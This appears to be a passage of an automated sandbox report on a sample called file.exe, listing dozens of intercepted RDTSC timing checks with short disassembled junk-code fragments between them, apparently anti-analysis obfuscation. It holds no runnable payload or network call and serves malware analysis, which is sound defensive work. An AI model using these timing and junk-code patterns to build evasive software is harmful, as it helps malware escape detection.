              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DCAB second address: D3DCB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F11A12050B6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DCB5 second address: D3DCD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F11A1057FB2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DCD0 second address: D3DCE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DCE1 second address: D3DCE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DCE5 second address: D3DCF9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F11A12050B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jl 00007F11A12050B6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DCF9 second address: D3DCFF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DE54 second address: D3DE67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 jno 00007F11A12050B6h 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DE67 second address: D3DE6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DE6D second address: D3DE83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F11A12050BFh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DE83 second address: D3DE89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DE89 second address: D3DEAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050C9h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3E00E second address: D3E023 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A1057FAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3E023 second address: D3E029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3E30A second address: D3E30E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3E30E second address: D3E316 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3E316 second address: D3E31B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3E611 second address: D3E615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3E615 second address: D3E619 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EA2D second address: D3EA44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050C3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EA44 second address: D3EA66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F11A1057FACh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F11A1057FABh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EA66 second address: D3EA6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EA6E second address: D3EA82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F11A1057FAEh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EE63 second address: D3EE69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EE69 second address: D3EE84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A1057FB6h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EE84 second address: D3EE8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EE8A second address: D3EE90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EE90 second address: D3EE94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EE94 second address: D3EEBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F11A1057FB1h 0x0000000c jp 00007F11A1057FA6h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push edi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D62C second address: D3D66B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F11A12050C1h 0x0000000b jmp 00007F11A12050C4h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007F11A12050B6h 0x00000019 jmp 00007F11A12050BBh 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44FC9 second address: D44FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43CFB second address: D43D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43E9A second address: D43EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A1057FB4h 0x00000009 ja 00007F11A1057FA6h 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43EB9 second address: D43EC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pop edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4395C second address: D43971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F11A1057FA6h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F11A1057FA6h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43971 second address: D43975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43975 second address: D43993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F11A1057FB2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43993 second address: D43997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43997 second address: D439DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F11A1057FB2h 0x0000000d push edx 0x0000000e jmp 00007F11A1057FB0h 0x00000013 jmp 00007F11A1057FB6h 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44846 second address: D44852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44852 second address: D44856 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44856 second address: D44877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F11A12050C9h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47418 second address: D4741E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4741E second address: D4742B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4742B second address: D4742F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4742F second address: D47435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4712C second address: D47132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49D5D second address: D49D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4A12D second address: D4A146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F11A1057FB2h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E820 second address: D4E83C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050C8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E83C second address: D4E842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E977 second address: D4E97B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E97B second address: D4E986 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E986 second address: D4E98C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EBF9 second address: D4EC0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c je 00007F11A1057FA6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EC0B second address: D4EC33 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F11A12050B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F11A12050C9h 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EC33 second address: D4EC42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jo 00007F11A1057FACh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EC42 second address: D4EC5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F11A12050C1h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EC5D second address: D4EC63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EC63 second address: D4EC67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EC67 second address: D4EC6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EC6B second address: D4EC7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F11A12050B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EC7B second address: D4EC7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EDCD second address: D4EDD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EEEE second address: D4EEFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F11A1057FA6h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EEFF second address: D4EF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EF03 second address: D4EF07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EF07 second address: D4EF15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EF15 second address: D4EF1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EF1B second address: D4EF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F11A12050BAh 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53990 second address: D5399B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F11A1057FA6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53C66 second address: D53C6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53C6C second address: D53C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53C72 second address: D53C89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050C1h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA40E second address: CFA47E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F11A1057FB3h 0x0000000e mov ebx, dword ptr [ebp+1247D342h] 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F11A1057FA8h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e mov di, dx 0x00000031 jmp 00007F11A1057FB9h 0x00000036 add eax, ebx 0x00000038 movzx ecx, cx 0x0000003b nop 0x0000003c push eax 0x0000003d push edx 0x0000003e jnl 00007F11A1057FACh 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5425A second address: D54260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59287 second address: D5928B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D602F1 second address: D602F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D602F5 second address: D602FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D602FB second address: D60319 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F11A12050B6h 0x0000000e jmp 00007F11A12050C0h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60319 second address: D6031D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61032 second address: D6103F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6103F second address: D61049 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F11A1057FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61049 second address: D61054 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F11A12050B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61054 second address: D6107F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 jmp 00007F11A1057FACh 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F11A1057FB0h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6107F second address: D61085 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61085 second address: D6108F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F11A1057FA6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61644 second address: D6164E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6164E second address: D61652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61652 second address: D6165A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6165A second address: D61662 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61662 second address: D61666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61666 second address: D6166C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D618EB second address: D618F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D618F1 second address: D618F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB4443 second address: CB447F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A12050BEh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F11A12050C9h 0x00000011 push ecx 0x00000012 jmp 00007F11A12050BCh 0x00000017 pop ecx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6AC4A second address: D6AC50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6AC50 second address: D6AC54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6AF22 second address: D6AF28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6AF28 second address: D6AF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6AF2D second address: D6AF4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F11A1057FB9h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6AF4A second address: D6AF58 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F11A12050B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6AF58 second address: D6AF5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6B391 second address: D6B396 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
